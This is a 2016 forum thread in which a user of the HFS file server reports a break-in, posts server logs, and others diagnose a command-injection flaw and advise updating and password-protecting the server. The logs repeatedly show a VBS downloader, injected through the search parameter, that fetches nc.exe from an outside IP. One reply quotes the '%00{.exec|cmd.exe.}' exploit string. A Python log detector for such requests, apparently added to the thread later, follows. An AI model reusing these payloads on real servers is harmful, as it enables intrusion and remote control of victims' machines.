Author Topic: i've been hacked  (Read 1788 times)


Offline userhfs

  • Occasional poster
  • *
  • Posts: 4
i've been hacked
« on: March 09, 2016, 03:10:25 PM »
Hello all!

Today my antivirus told me that a trojan was deleted. It was a VBS script; I opened it in N++ and here it is in the screenshot.

After that I started trying to find out how it happened, and I found it. HFS is working on port 80, and every day I get a lot of messages of "requested GET" and "trying to upload xml". I opened HFS and saw it (see the screenshot).

I've exported the full log to a txt file and here it is:

Code:
9:24:21 150.70.188.172:53306 Requested GET /
9:31:24 150.70.173.52:45675 Requested GET /
10:33:11 150.70.188.182:45937 Requested GET /
12:42:17 127.0.0.1:58565 Upload failed, Folder not found: getstring.xml
13:10:33 150.70.188.178:57561 Requested GET /
15:19:09 150.70.188.178:52023 Requested GET /
15:36:46 150.70.173.43:58891 Requested GET /
17:06:33 150.70.173.7:48701 Requested GET /
18:37:18 150.70.188.181:50506 Requested GET /
19:07:36 150.70.173.57:57074 Requested GET /
20:01:32 188.138.1.218:42693 Requested GET /
21:58:16 188.32.198.69:17087 Requested GET /
14:03:59 127.0.0.1:64139 Upload failed, Folder not found: getstring.xml
21:34:42 150.70.173.10:54565 Requested GET /
23:49:04 150.70.188.172:57408 Requested GET /
0:05:27 150.70.173.8:56183 Requested GET /
0:35:08 150.70.188.169:41555 Requested GET /
3:21:10 150.70.188.166:44530 Requested GET /
4:36:26 150.70.97.86:48072 Requested GET /
6:51:26 150.70.173.49:34699 Requested GET /
7:13:12 185.130.5.146:41838 Requested HEAD /
7:27:38 94.102.49.78:32822 Requested GET /
10:14:02 95.220.12.221:56833 Requested GET /
10:14:02 95.220.12.221:56841 Requested GET /
11:36:21 150.70.188.182:36670 Requested GET /
11:50:43 150.70.173.55:57792 Requested GET /
12:54:18 150.70.188.179:46689 Requested GET /
13:59:29 150.70.173.44:58075 Requested GET /
14:04:32 127.0.0.1:61309 Upload failed, Folder not found: getstring.xml
23:53:11 150.70.188.180:38578 Requested GET /
2:39:02 162.13.170.123:60331 Requested GET /
14:05:32 127.0.0.1:58712 Upload failed, Folder not found: getstring.xml
14:14:29 193.124.183.62:59434 Requested GET /
18:38:16 150.70.188.165:52615 Requested GET /
0:53:07 150.70.188.180:38067 Requested GET /
3:02:21 150.70.173.41:58793 Requested GET /
4:21:49 37.153.173.10:57460 Requested GET /
5:25:08 185.129.62.62:55354 Requested GET /
5:45:42 185.65.135.227:54500 Requested GET /
6:58:03 171.25.193.131:22518 Requested GET /
9:45:22 150.70.173.5:41667 Requested GET /
11:56:00 193.124.183.62:50858 Requested GET /
12:24:58 185.130.5.146:47664 Requested HEAD /
14:06:30 127.0.0.1:51959 Upload failed, Folder not found: getstring.xml
16:53:28 163.172.13.21:63567 Requested GET /
17:53:59 66.240.192.138:51136 Requested GET /
18:17:14 150.70.188.171:37191 Requested GET /
21:19:42 159.224.52.241:57673 Requested GET /
22:04:44 150.70.173.40:58734 Requested GET /
23:13:02 193.124.183.62:62283 Requested GET /
0:27:39 162.13.170.123:56872 Requested GET /
4:04:43 188.32.105.181:65077 Requested GET /
4:09:21 150.70.173.58:34591 Requested GET /
5:16:26 77.247.181.162:46931 Requested GET /
7:49:13 51.254.44.137:41738 Requested GET /
9:49:22 150.70.188.178:55827 Requested GET /
10:38:10 193.124.183.62:61670 Requested GET /
14:07:31 127.0.0.1:54231 Upload failed, Folder not found: getstring.xml
15:42:55 185.130.5.146:39691 Requested HEAD /
17:24:32 137.226.113.7:44838 Requested GET /
19:15:21 193.124.183.62:55358 Requested GET /
1:46:28 188.138.1.218:59867 Requested GET /
3:10:43 62.210.162.182:41469 Requested GET /
3:10:45 62.210.162.182:48773 Requested GET /
4:50:19 176.10.99.206:60831 Requested GET /
5:05:30 112.115.19.84:60662 Requested GET /
5:06:00 112.115.19.84:60676 Requested GET /?search=> dim bStrm: Set bStrm = createobject("Adodb.Stream")
> xHttp.Open "GET", "http://150.129.217.214/nc.exe", False
> xHttp.Send
>
> with bStrm
>     .type = 1 '//binary
>     .open
>     .write xHttp.responseBody
>     .savetofile "C:\Users\Public\nc.exe", 2 '//overwrite
> end with.}
5:06:03 112.115.19.84:60677 Requested GET /?search=5:06:04 112.115.19.84:60678 Requested GET /?search=5:06:10 112.115.19.84:60679 Requested GET /?search=> dim bStrm: Set bStrm = createobject("Adodb.Stream")
> xHttp.Open "GET", "http://150.129.217.214/nc.exe", False
> xHttp.Send
>
> with bStrm
>     .type = 1 '//binary
>     .open
>     .write xHttp.responseBody
>     .savetofile "C:\Users\Public\nc.exe", 2 '//overwrite
> end with.}
5:06:13 112.115.19.84:60680 Requested GET /?search=5:06:14 112.115.19.84:60681 Requested GET /?search=5:17:19 112.115.19.84:60818 Requested GET /
5:17:46 112.115.19.84:60839 Requested GET /?search=> dim bStrm: Set bStrm = createobject("Adodb.Stream")
> xHttp.Open "GET", "http://150.129.217.214/nc.exe", False
> xHttp.Send
>
> with bStrm
>     .type = 1 '//binary
>     .open
>     .write xHttp.responseBody
>     .savetofile "C:\Users\Public\nc.exe", 2 '//overwrite
> end with.}
5:17:49 112.115.19.84:60840 Requested GET /?search=5:17:49 112.115.19.84:60841 Requested GET /?search=5:17:58 112.115.19.84:60842 Requested GET /?search=> dim bStrm: Set bStrm = createobject("Adodb.Stream")
> xHttp.Open "GET", "http://150.129.217.214/nc.exe", False
> xHttp.Send
>
> with bStrm
>     .type = 1 '//binary
>     .open
>     .write xHttp.responseBody
>     .savetofile "C:\Users\Public\nc.exe", 2 '//overwrite
> end with.}
5:18:00 112.115.19.84:60843 Requested GET /?search=5:18:01 112.115.19.84:60844 Requested GET /?search=5:32:09 150.70.188.181:42913 Requested GET /
5:58:29 150.70.188.181:42625 Requested GET /

So, what should I do to prevent the same situation? Now I've switched off HFS+, but I really need it. Let me know how to prevent illegal actions. Thanks!

Offline Mars

  • Operator
  • Tireless poster
  • *****
  • Posts: 1882
Re: i've been hacked
« Reply #1 on: March 09, 2016, 11:01:10 PM »
very strange??

The target IP for nc.exe is an HFS web server.

The VBS script probably came from another source.

What you can do is log to a file and select "request dump" and eventually "reply" to obtain more information about connections.

If possible, block all communication from and to this IP in your firewall.

« Last Edit: March 09, 2016, 11:20:27 PM by Mars »

Offline userhfs

  • Occasional poster
  • *
  • Posts: 4
Re: i've been hacked
« Reply #2 on: March 10, 2016, 06:16:51 AM »
The VBS script came from HFS+, as you can see, through an HFS vulnerability. The hacker put a special command in the search field and the file was created on my PC. Are there any admins or technicians here? I guess they should know about that. It's my fault that the root directory didn't have a password. Now I've protected it with a password, so the hacker can't access the search field. The 2nd step was an update of HFS, from 2.3 to 2.3g.

Offline Mars

  • Operator
  • Tireless poster
  • *****
  • Posts: 1882
Re: i've been hacked
« Reply #3 on: March 10, 2016, 10:46:15 AM »
With the latest build you can be reassured, because you were using build 289, which was vulnerable to the cmd attack by URL with "? search = 00%{exec|cmd.exe.}".

Similarly, as explained in this post about build 287, build 289 was not protected:
http://www.rejetto.com/forum/bug-reports/uploading-backdor-in-287/msg1060051/#msg1060051
Since HFS 2.3d build 292 the problem is solved.

Because I have certain privileges here, it is possible for me to access the home page of your server from your IP. I see that you have updated HFS to the latest version, so you no longer risk being the injured party in the same attack.
 
you can now rest easy ;)

Strangely, the HFS server complained that the IP address 150.129.217.214 is no longer available.

The "hacker" is not a stranger on the forum ;D ;D
« Last Edit: March 10, 2016, 11:07:59 AM by Mars »
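Added example, not code from this thread or from HFS itself: a small Python detector that parses HFS log lines in the format shown in the first post and flags requests whose query string carries HFS macro delimiters, the %00 prefix Mars mentions, the exec macro, or fragments of the VBS downloader quoted in the log, then counts hits per source IP. The sample log lines and IP addresses below are constructed for the example, not taken from the poster's server.

```python
import re
from collections import Counter

# One HFS log line in the format shown in the thread: "H:MM:SS ip:port Requested METHOD target"
LINE_RE = re.compile(
    r"^(?P<time>\d{1,2}:\d{2}:\d{2}) (?P<ip>\d{1,3}(?:\.\d{1,3}){3}):(?P<port>\d+) "
    r"Requested (?P<method>[A-Z]+) (?P<target>\S.*)$"
)

# Indicators that a query string carries HFS macro syntax or a script body instead of a search term
INDICATORS = {
    "macro_delimiter": re.compile(r"\{\.|\.\}"),           # HFS macros are written as {. ... .}
    "null_byte": re.compile(r"%00", re.I),                 # the %00 prefix mentioned in Reply #3
    "exec_macro": re.compile(r"\bexec\|", re.I),           # the exec|... command macro
    "vbs_downloader": re.compile(r"createobject|adodb\.stream|savetofile|responsebody", re.I),
}

def parse_line(line):
    """Return the fields of a 'Requested' line, or None for other entries (uploads, update checks)."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None

def classify(target):
    """Names of the indicators found in the request target (path plus query string)."""
    return [name for name, rx in INDICATORS.items() if rx.search(target)]

def scan(lines):
    """Return (findings, per_ip): flagged requests and a Counter of flagged requests per source IP."""
    findings, per_ip = [], Counter()
    for line in lines:
        rec = parse_line(line)
        if not rec or "?" not in rec["target"]:   # only requests that carry a query string
            continue
        hits = classify(rec["target"])
        if hits:
            findings.append({"time": rec["time"], "ip": rec["ip"], "hits": hits})
            per_ip[rec["ip"]] += 1
    return findings, per_ip

# Constructed sample log (IPs are documentation addresses, not the poster's)
SAMPLE_LOG = """\
5:05:30 198.51.100.7:60662 Requested GET /
5:06:00 198.51.100.7:60676 Requested GET /?search=> dim bStrm: Set bStrm = createobject("Adodb.Stream")
5:06:13 198.51.100.7:60680 Requested GET /?search=%00{.exec|cmd.exe.}
5:32:09 203.0.113.9:42913 Requested GET /?search=report.pdf
7:13:12 203.0.113.10:41838 Requested HEAD /
14:07:31 127.0.0.1:54231 Upload failed, Folder not found: getstring.xml
""".splitlines()

if __name__ == "__main__":
    found, ips = scan(SAMPLE_LOG)
    for f in found:
        print(f["time"], f["ip"], ", ".join(f["hits"]))
    print("flagged requests per IP:", dict(ips))
```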

Offline userhfs

  • Occasional poster
  • *
  • Posts: 4
Re: i've been hacked
« Reply #4 on: March 11, 2016, 07:51:00 PM »
Thanks for your reply! OK, now I've set a password for the root directory, and the 'search field' is now unavailable. Thanks!

Offline userhfs

  • Occasional poster
  • *
  • Posts: 4
Re: i've been hacked
« Reply #5 on: March 12, 2016, 08:38:02 PM »
And could someone tell me what this means?

Code:
14:11:08 127.0.0.1:55616 Upload failed for getstring.xml: Folder not found.
14:11:08 127.0.0.1:55616 Upload failed getstring.xml
18:13:23 Check update: no new version

Offline LeoNeeson

  • Tireless poster
  • ****
  • Posts: 579
  • Solitario...
Re: i've been hacked
« Reply #6 on: March 13, 2016, 10:04:25 AM »
By doing a lookup on that IP address range, it seems that 150.70.*.* (which appears a lot in your log) belongs to the "trendmicro.com" company, in Japan. Maybe this company was scanning your server, or doing something weird? I don't know, but it doesn't look like an IP address from a normal ISP.

The IP 150.129.217.214 is from some ISP in China, and may be some attacker. Well, I'm not an expert on this, but there is no more public information about who may be behind this (only that Chinese ISP knows who the end user was, if that user wasn't browsing from a public cybercafe).

Offline Mars

  • Operator
  • Tireless poster
  • *****
  • Posts: 1882
Re: i've been hacked
« Reply #7 on: March 13, 2016, 09:58:30 PM »
Using this software, you will see in real time which process is using the address 127.0.0.1 remotely on port 80.

Unzip and run TCPView.exe; you may get an alert from your protection software, which you can ignore without risk.

Offline rejetto

  • Administrator
  • Tireless poster
  • *
  • Posts: 12949
Re: i've been hacked
« Reply #8 on: March 14, 2016, 10:25:16 PM »
I'm sorry for this accident, but it's a bad idea to have a server on the internet and not let it update.
